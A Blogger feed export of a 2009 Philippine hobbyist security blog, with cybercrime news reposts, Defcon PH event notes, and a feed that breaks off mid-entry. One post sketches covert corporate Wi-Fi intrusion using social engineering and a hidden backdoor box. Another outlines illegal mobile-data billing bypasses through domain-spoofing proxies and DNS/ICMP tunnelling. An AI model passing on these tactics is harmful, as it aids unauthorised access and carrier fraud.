<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-7007896954058520891</id><updated>2011-07-31T06:53:31.421+08:00</updated><title type='text'>Continuum...</title><subtitle type='html'>pinoy linux hobbyist with an interest in network security</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>70</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-4730577052833566094</id><published>2009-08-24T17:19:00.003+08:00</published><updated>2009-08-24T18:23:18.281+08:00</updated><title type='text'>Killing Time...</title><content type='html'>Ok, I'm just killing time here so I decided to blog since I haven't posted anything recently.&lt;br /&gt;&lt;br /&gt;Underwent something major in my lovelife. My girlfriend and I almost broke up. We made up but it was pretty emotional for a while. =)&lt;br /&gt;&lt;br /&gt;Ok, on to hacking... (what a segue =) )&lt;br /&gt;&lt;br /&gt;What's the best portable hacking device? For me it would be the asus eee, the ones with the atheros card for wep cracking. (Cheap too, best criteria =) )&lt;br /&gt;&lt;br /&gt;But the problem is, if you're going to hack a specific target, presumably something corporate, you just couldn't walk into the building, pull out your laptop and start hacking in the hallway (And for pete's sake, change the backtrack logo. I've seen &lt;strong&gt;you&lt;/strong&gt; booting it, dead giveaway). Yes, you could probably use a directional antenna, blah blah blah, but the typical scenario in the philippines is, your target just leases a room or a whole floor inside a building in makati. What if it was on the twenty second floor? Also what if the signal strength was just strong enough NOT to be detected outside the building?&lt;br /&gt;&lt;br /&gt;So you have to come in close, come in corporate attire (ditch the faded denim pants, black shirt, and backpack), and try to find an inconspicious place to hack out of (the comfort rooms usually found on both ends of the floor is usually sufficient).&lt;br /&gt;&lt;br /&gt;But what if the comfort rooms was locked or too far away? (sucks if you really do have to take a piss). You have to go to their receiving area and try to social engineer your way into staying a bit (they may even have free coffee =) ). And again the problem is you just can't pull out your laptop and start hacking there ("Bos, hindi po ito starbaks..."). So the best thing you can do is turn on your laptop beforehand, set up an ad-hoc wifi with broadcasting disabled, put it back inside your bag before you enter the room, and then use your ipod touch, iphone, or even your wifi enabled nokia cellphone to ssh into your laptop. Simple ain't it? =)&lt;br /&gt;&lt;br /&gt;Well, there's been a talk about using an ipod touch for mobile hacking, but it's too underpowered compared to a laptop. I hear installing all the right tools can be a bitch too.&lt;br /&gt;&lt;br /&gt;Ok, and uhm, about the creepbox (creeper box). It's a gadget you typically leave unseen connected into the target network either through wifi or through an unused lan port (there's probably a creepbox stucked behind your server rack hehe). They're to provide a (usually wifi ap) backdoor to the target network because some targets are offline networks, and some targets &lt;em&gt;really really&lt;/em&gt; monitor internet connections (and some targets, in an effort to thwart porn left downloading in the night, disconnect from the internet at night, at least that's what I think their reason is =) ) . These are usually home made kits (soekris) or made from ripped apart netbooks (you could buy a used eee pc 2g for around Php 6k on tipidpc). You could also use an ipod touch (finders keepers), the problem is it's wifi only. I've also toyed with the idea of using linksys wifi routers (they can boot linux). Oh, and on the Stealing The Network series they had one with a gsm modem and set up so it would basically phone home.&lt;br /&gt;&lt;br /&gt;So, uhm, what else? Oh, and the hacking stuff above? I haven't done any of it. It's fiction based on some ideas I had =)&lt;br /&gt;&lt;br /&gt;I guess that's it...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-4730577052833566094?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/4730577052833566094/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=4730577052833566094' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/4730577052833566094'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/4730577052833566094'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2009/08/killing-time.html' title='Killing Time...'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-8612804551892103622</id><published>2009-07-01T08:51:00.000+08:00</published><updated>2009-07-01T08:52:54.055+08:00</updated><title type='text'>CICT forms its own cybercrime unit</title><content type='html'>&lt;p&gt;&lt;a href="http://newsinfo.inquirer.net/breakingnews/infotech/view/20090630-213163/CICT-forms-its-own-cybercrime-unit"&gt;Original Story&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;WITH the prospect of the cybercrime bill becoming a law, the Commission on Information and Communications Technology (CICT) has been slowly putting up a cybersecurity coordination center in its main office in UP Diliman.&lt;/p&gt; &lt;p&gt;The CICT has been lobbying for the passage of the cybercrime bill, which has been sitting in Congress for at least five years.&lt;/p&gt; &lt;p&gt;The bill has already passed the first reading under the Lower House committee on appropriations and a Senate version is already in the works.&lt;/p&gt; &lt;p&gt;The office is headed by former Philippine National Police (PNP) general Virtus Gil, who also served as President Gloria Macapagal-Arroyo’s deputy national security adviser.&lt;/p&gt; &lt;p&gt;In an interview, CICT chairman Ray Anthony Roxas-Chua said the cybercrime division is not yet functional but its people would have the skills to conduct investigations on cybercrime.&lt;/p&gt; &lt;p&gt;Roxas-Chua stressed that the CICT should be leading in the creation of a cybercrime group due to its existing e-government modernization mandate.&lt;/p&gt; &lt;p&gt;He also expects the cybercrime division to help the private sector deal with security threats.&lt;/p&gt; &lt;p&gt;However, the existence of CICT’s cybercrime division is pegged on the passage of the cybercrime bill.&lt;/p&gt; &lt;p&gt;If a law is not passed, Roxas-Chua said they may look into other funding options to keep the cybercrime division, most likely from the e-government fund.&lt;/p&gt; &lt;p&gt;With less than a year to go before the next elections, Roxas-Chua said they are pushing further to have the law passed soon.&lt;/p&gt; &lt;p&gt;“That’s why we’re emphasizing a lot on the need for a cybercrime law. It will protect government IT projects and the country’s growing IT industries,” Roxas-Chua said.&lt;/p&gt; &lt;p&gt;There had been previous attempts at creating an anti-cybercrime group by the government.&lt;/p&gt; &lt;p&gt;The first was in 2004 with the creation of the Task Force for the Security of Critical Infrastructure headed by Abraham Purruganan. It laid out a long-term National Cybersecurity Plan that was not implemented.&lt;/p&gt; &lt;p&gt;Another was the Government Computer Security and Incident Response Team led by the PNP. The National Bureau of Investigation (NBI) also has its Anti-Fraud and Computer Crimes Division.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-8612804551892103622?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/8612804551892103622/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=8612804551892103622' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/8612804551892103622'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/8612804551892103622'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2009/07/cict-forms-its-own-cybercrime-unit.html' title='CICT forms its own cybercrime unit'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-5119477802675030170</id><published>2009-05-18T09:19:00.003+08:00</published><updated>2009-05-18T09:47:07.276+08:00</updated><title type='text'>UBT/FBT Notes</title><content type='html'>I won't go much into details. &lt;br /&gt;&lt;br /&gt;UBT = Unlimited Browsing Techniques&lt;br /&gt;FBT =  Free Browsing Techniques&lt;br /&gt;&lt;br /&gt;Basically these are hacks to be able to get online without being charged by the Globe or Smart networks. Almost all of them require a proxy server of some sort. Not all of them work and some only work using a particular network. All of them are illegal so use at your own risk!&lt;br /&gt;&lt;br /&gt;*Whitelisted domains&lt;br /&gt;&lt;br /&gt;Most networks allow free access to specific domains. The technique is to use a proxy and to trick the filter into thinking the proxy is part of an allowed domain. Ex. allowed-domain.proxy.com. The filter sees the string "allowed-domain" and allows the (proxied) traffic to pass thru uncharged.&lt;br /&gt;&lt;br /&gt;*Whitelisted ports&lt;br /&gt;&lt;br /&gt;This used to be found on the Globe networks but was (unknowingly?) patched when they did some network upgrades. Basically they allow http traffic on unconventional ports.&lt;br /&gt;&lt;br /&gt;*DNS  Encapsulation&lt;br /&gt;&lt;br /&gt;You could encapsulate other kinds of tcp/ip traffic in dns packets. The network  does not charge for domain name lookups, etc.&lt;br /&gt;&lt;br /&gt;*ICMP Encapsulation&lt;br /&gt;&lt;br /&gt;Similar to DNS encapsulation, you could encapsulate data in ICMP traffic. Some networks charge for ICMP traffic though.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-5119477802675030170?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/5119477802675030170/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=5119477802675030170' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5119477802675030170'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5119477802675030170'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2009/05/ubtfbt-notes.html' title='UBT/FBT Notes'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-8153918120520506048</id><published>2009-04-25T13:40:00.004+08:00</published><updated>2009-04-28T16:41:05.490+08:00</updated><title type='text'>Defconph Beertalk II (Manila)</title><content type='html'>Ok. A quick review of what went down last night.&lt;br /&gt;&lt;br /&gt;Got to the venue a bit late. When I got in the event had started and tikbalang was already presenting. There were a bunch of guys who came in the same time of me and we were all standing at the back. There were about ten of us who stood at the back until the presentation ended and we found available seats. Saw some slides about something about Amazon but between trying to find a good spot and the slightly poor audio I didn't understand what the presentation was about.&lt;br /&gt;&lt;br /&gt;*Major Gripe; The venue was freaking HOT!*&lt;br /&gt;&lt;br /&gt;It was so bad that I couldn't take it anymore and I decided to go outside while the Bullsh!t presentation was ongoing since I was not really that interested  in his topic which was about a botnet. There were several of us outside and we just talked while occasionally peering in to look at the presentation.&lt;br /&gt;&lt;br /&gt;The last speaker (thestare) did not start immediately after Bullsh!t's presentation  and by the time his presentation started I've met some of my past acquaintances and we were shooting the breeze and smoking outside while he gave his presentation.&lt;br /&gt;&lt;br /&gt;So I basically missed the first presentation. Wasn't really interested in the second one. And was standing outside during the third presentation. I'll just download the slides when they put it online.&lt;br /&gt;&lt;br /&gt;Hackista.  I came in wanting to join the game. Became bummed out because of the heat that I backed out. By the time the game started I became a bit excited and pulled out my laptop. Because of the heat inside the venue the group I was with had started hanging out inside the adjoining restaurant/bar.  The game master had given an initial  ip address but because of some network problems they decided to change it. Non-issue except that we were outside the venue and we're trying to attack the old ip add hehe. Somebody then told us the new target ip. But the network was having problems and I couldn't connect to the network. And also a major problem, for me anyways, with all the excitement I needed to smoke and unfortunately the restaurant we were in didn't allow smoking. So I had to either go outside or go inside the venue where smoking was allowed. Between this, and the network problems I just decided to shut down the laptop and not play anymore. Also, this was my first time to join a CTF and I was a bit bothered by all the people walking by, standing behind you and trying to look at what you're doing. Definitely not my usual environment. Maybe next ime I'll be able to adjust.&lt;br /&gt;&lt;br /&gt;The CTF seemed to be the best part of the event. A foreigner won the game. I talked to him while he was trying to exploit the target. Another first for me, talking to a foreign hacker live :) Actually we seemed to be having the same ideas at the time about how to exploit the target.  He had already gotten a shell by then but his connection has stopped responding. Anyway congratulations to him and his company. Oh, and the gamemaster was drunk hehe.&lt;br /&gt;&lt;br /&gt;And that's it. Lots of beer available which was a very good thing. Met some new people, hanged out with some old ones.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;*Edit* Edited out thestare being late because apparently he gave notice to the organizers that he had a prior engagement&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-8153918120520506048?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/8153918120520506048/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=8153918120520506048' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/8153918120520506048'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/8153918120520506048'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2009/04/defconph-beertalk-ii-manila.html' title='Defconph Beertalk II (Manila)'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-3891739665233841660</id><published>2009-04-07T18:17:00.003+08:00</published><updated>2009-04-07T18:36:26.385+08:00</updated><title type='text'>Linux Most Hacked</title><content type='html'>&lt;a href="http://www.journal.com.ph/index.php?issue=2009-04-02&amp;amp;sec=4&amp;amp;aid=89561"&gt;Original Story&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Interesting story about Philippine websites defaced during the last six years. Statistics show that hackers seem to like linux;&lt;br /&gt;&lt;br /&gt;"Hackers used the Linux Operating System (OS) to deface 507 of the websites, WIN2000 71 times; and WIN2003, FREEBSD and WINNT9X 13 times each.&lt;br /&gt;&lt;br /&gt;Of the 667 government websites defaced during the period, 507 or 76 percent were using Linux as their OS."&lt;br /&gt;&lt;br /&gt;"Sosa said they have identified 134 “coded defacers” who attacked government websites during the period and tagged a group called “Hackers” as the one with the most number of intrusions at 248 in 2006 alone followed by the “Ashiyane Digital Security Team” with 106 hits, and “Infern.4iL” with 17.&lt;br /&gt;&lt;br /&gt;The others are “Saudi Security Terror” and “Skorptix” with nine attacks each; ‘Denger’ with eight hits; “HMEI,” “DARK HUNTER” and HIS IRAN HACKER SABOTAGE” with seven intrusions each. A group called “ALPTURKTIGIN” and “REBARZ99,” the well-known Filipino hacker each scored six hits during the same period.&lt;br /&gt;&lt;br /&gt;The remaining 123 “coded hackers” have insignificant frequency of attacks varying from five to one intrusion a year, Sosa said. "&lt;br /&gt;&lt;br /&gt;A group called Hackers hehehe. Isn't that a collective noun which would explain the higher number of intrusions? Rebarz99 seems to be the only filipino hacker mentioned. Prime candidate to be made an "example" since the others are foreigners and would be impossible for the PNP to capture.  And why are some websites repeatedly "hit" ? Wouldn't a single or double be enough grounds to secure and prevent future hits? No statistics on the method of intrusion and if any of the hackers were caught. Interestingly enough the article was ended on the emphasis that the hacked servers were running linux.&lt;br /&gt;&lt;br /&gt;"...the Linux Operating System, a free and openly available software which makes them highly vulnerable to hacking"&lt;br /&gt;&lt;br /&gt;I'm waiting to see how the PLUG members react to this  =)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-3891739665233841660?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/3891739665233841660/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=3891739665233841660' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/3891739665233841660'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/3891739665233841660'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2009/04/linux-most-hacked.html' title='Linux Most Hacked'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-8222709797187057445</id><published>2009-03-31T11:45:00.003+08:00</published><updated>2009-03-31T11:51:41.954+08:00</updated><title type='text'>Uhm, Duh?</title><content type='html'>Reports that computers of the Department of Foreign Affairs had been hacked triggers concerns about the nation's need for a cybersecurity program.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://newsinfo.inquirer.net/breakingnews/infotech/view/20090330-196886/Cyber_spies_hack_into_DFA_computers"&gt;http://newsinfo.inquirer.net/breakingnews/infotech/view/20090330-196886/Cyber_spies_hack_into_DFA_computers&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://technology.inquirer.net/infotech/infotech/view/20090330-197020/DFA-to-investigate-hacking-report"&gt;http://technology.inquirer.net/infotech/infotech/view/20090330-197020/DFA-to-investigate-hacking-report&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://technology.inquirer.net/infotech/infotech/view/20090331-197122/RP-govt-websites-vulnerable-to-hacking"&gt;http://technology.inquirer.net/infotech/infotech/view/20090331-197122/RP-govt-websites-vulnerable-to-hacking&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://technology.inquirer.net/infotech/infotech/view/20090330-197041/RP-needs-cybersecurity-program--CICT"&gt;http://technology.inquirer.net/infotech/infotech/view/20090330-197041/RP-needs-cybersecurity-program--CICT&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;More jobs for the nations licensed pentesters and cybersecurity professionals.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-8222709797187057445?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/8222709797187057445/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=8222709797187057445' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/8222709797187057445'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/8222709797187057445'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2009/03/uhm-duh.html' title='Uhm, Duh?'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-1433498030779016020</id><published>2009-03-26T11:34:00.001+08:00</published><updated>2009-03-26T11:36:27.554+08:00</updated><title type='text'>Grrr...</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://sujiru.googlepages.com/grr.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 640px; height: 480px;" src="http://sujiru.googlepages.com/grr.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-1433498030779016020?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/1433498030779016020/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=1433498030779016020' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/1433498030779016020'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/1433498030779016020'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2009/03/grrr.html' title='Grrr...'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-8116537834032344712</id><published>2009-03-17T19:48:00.002+08:00</published><updated>2009-03-17T19:55:57.946+08:00</updated><title type='text'>Comelec dares hackers to crack software</title><content type='html'>&lt;span style="font-style:italic;"&gt;(Too tired to comment on this and the preceeding blog entry. Only putting it here for easy reference and for posterity's sake)&lt;span style="font-weight:bold;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://newsinfo.inquirer.net/inquirerheadlines/nation/view/20090317-194544/Comelec-dares-hackers-to-crack-software"&gt;Original Story&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;MANILA, Philippines—Let’s see if old-fashioned dagdag-bawas (vote-padding and shaving) schemes can catch up with technology.&lt;br /&gt;&lt;br /&gt;The Commission on Elections (Comelec) is challenging computer hackers to take a crack at the software that will be used in the 2010 elections to prove that the system is secure from fraud and tampering.&lt;br /&gt;&lt;br /&gt;“By the time a hacker gets into our system, the election is over,” Comelec Executive Director Jose Tolentino boldly declared Monday in a press briefing.&lt;br /&gt;&lt;br /&gt;Tolentino said the Comelec would welcome cyber-security experts who wish to check the system for weaknesses.&lt;br /&gt;&lt;br /&gt;Programmers and the general public can also scrutinize the source code of the company that will bag the P11.3-billion automation contract for the 2010 national elections.&lt;br /&gt;&lt;br /&gt;The source code refers to the set of programs that carries the system’s instructions.&lt;br /&gt;&lt;br /&gt;“The winning bidder’s software, the source code, will be open to inspection by the public,” Tolentino told reporters.&lt;br /&gt;&lt;br /&gt;“They can look at it line by line to ensure that there is no malicious program inside,” he said.&lt;br /&gt;&lt;br /&gt;The Comelec will also open the system and the machines to “ethical hackers” or IT experts who would be allowed by the agency to test the system.&lt;br /&gt;&lt;br /&gt;“Then there are those who might try to hack the system without telling us. That’s OK. We are open to that,” he said.&lt;br /&gt;&lt;br /&gt;Tolentino was parrying criticisms from politicians, poll watchdogs, and some IT experts who fear that the Comelec’s adoption of the Precinct Counting Optical Scan (PCOS) system would only give rise to a new, more sophisticated mode of election cheating.&lt;br /&gt;&lt;br /&gt;Doubters&lt;br /&gt;&lt;br /&gt;PCOS refers to the general scheme that the Comelec had chosen for the casting, counting and canvassing of votes for the 2010 elections. Up for bidding next month is the contract for the specific software and voting and counting machines on which the PCOS will be run.&lt;br /&gt;&lt;br /&gt;Doubting the Comelec’s readiness to fully automate by May 2010, former Comelec Chair Christian Monsod earlier warned that “software specialists” would now take on the dirty job previously carried out manually by unscrupulous poll personnel and political operatives.&lt;br /&gt;&lt;br /&gt;Among the infamous methods of large-scale fraud widely alleged to have marred past manual elections was the so-called dagdag-bawas scheme, or the manipulation of election results through vote padding and shaving.&lt;br /&gt;&lt;br /&gt;IT expert and transparentelections.org head Gus Lugman had also noted that the Comelec would be relying on software “not written in the Philippines.”&lt;br /&gt;&lt;br /&gt;But Tolentino Monday said anyone who planned to attack the system would not only need technical expertise but also huge funding to set up powerful computers that could crack the 128-bit encryption code.&lt;br /&gt;&lt;br /&gt;Stored at BSP&lt;br /&gt;&lt;br /&gt;For added security, the source code of the chosen system will be stored “in escrow” at the Bangko Sentral ng Pilipinas (BSP), he added.&lt;br /&gt;&lt;br /&gt;Also Monday, Comelec Chair Jose Melo presented the poll body’s terms of reference (TOR) or the technical and financial requirements for the contract bidders.&lt;br /&gt;&lt;br /&gt;The TOR mainly requires interested suppliers to provide a paper-based automation election system, a system for the electronic transmission of the results, and a management plan governing the entire process.&lt;br /&gt;&lt;br /&gt;The Comelec will release the TOR documents, priced at $20,000 per set, on March 18.&lt;br /&gt;&lt;br /&gt;10 bidders&lt;br /&gt;&lt;br /&gt;“The last day of purchasing (the documents) is on March 25. On March 27, there would be a pre-bidding conference where bidders can seek to clarify matters,” Melo said.&lt;br /&gt;&lt;br /&gt;The Comelec will open the bids on April 27 and award the contract not later than May 21.&lt;br /&gt;&lt;br /&gt;Melo earlier announced that 10 companies had expressed interest in joining the bidding for the P11.3-billion automation contract.&lt;br /&gt;&lt;br /&gt;He then assured critics that since these companies have international operations and reputations to protect, they would not allow their products to be used for fraud in the coming Philippine elections.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-8116537834032344712?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/8116537834032344712/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=8116537834032344712' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/8116537834032344712'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/8116537834032344712'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2009/03/comelec-dares-hackers-to-crack-software.html' title='Comelec dares hackers to crack software'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-1059146003393712871</id><published>2009-03-17T19:44:00.001+08:00</published><updated>2009-03-17T19:46:36.447+08:00</updated><title type='text'>Defconph BeerTalk II (Manila)</title><content type='html'>Where:&lt;br /&gt;Grilla Paseo De Roxas Avenue Branch, Makati&lt;br /&gt;Near Greenbelt&lt;br /&gt;&lt;br /&gt;When:&lt;br /&gt;April 24, 2009 @ 1900 HRS PHT&lt;br /&gt;&lt;br /&gt;Who Should Attend:&lt;br /&gt;Everyone can attend not just IT enthusiasts. We mean everyone, humans on different fields like Feds, Lawyers, Salesman, anyone who are willing to learn what is going on with information security these days.&lt;br /&gt;&lt;br /&gt;Registration Fee:&lt;br /&gt;Early Php800.00 / Late Registration Php1500.00 includes DEFCONPH Official T-shirt, &lt;span style="font-weight:bold;"&gt;2 Bottle of Booze&lt;/span&gt; and 2 Slice of Pizza&lt;br /&gt;&lt;br /&gt;NOTE: Early Registration closes on April 12, 2009&lt;br /&gt;&lt;br /&gt;DEFCON Philippines BeerTalk II(Manila) Full Track&lt;br /&gt;7:00PM - 7:10PM  Welcome Address&lt;br /&gt;7:10PM - 7:30PM  Introduction to DEFCON Philippines&lt;br /&gt;7:30PM - 8:20PM  Unconventional Privilege Escalation&lt;br /&gt;8:20PM - 8:30PM  Q&amp;A&lt;br /&gt;8:30PM - 9:20PM  Penetration Testing, A Structured Approach: Conducting Penetration Tests in a business environment&lt;br /&gt;9:20PM - 9:30PM  Q&amp;A&lt;br /&gt;10:30PM - 11:20PM  The Waledac Botnet&lt;br /&gt;11:20PM - 11:30PM  Q&amp;A&lt;br /&gt;11:30PM - 12:30PM  Games - Hackista 2009 (Øpen Hack Challenge)&lt;br /&gt;12:30PM - 12:45PM  Closing Remarks / Awards and Recognition&lt;br /&gt;12:45PM - onwards  More BEER .... ..... .... Drink til you Drop&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Unconventional Privilege Escalation&lt;br /&gt;&lt;br /&gt;Speaker: Tikbalang&lt;br /&gt;&lt;br /&gt;Synopsis: Conventional privilege escalation deals with vulnerabilities and acquiring root level in the system. Is there a way of escalating privilege (unconventionally) without having the root level? Up to what extent can the escalations go? Is it really a threat to consider? Are people affected by this?&lt;br /&gt;&lt;br /&gt;Penetration Testing, A Structured Approach: Conducting Penetration Tests in a business environment&lt;br /&gt;&lt;br 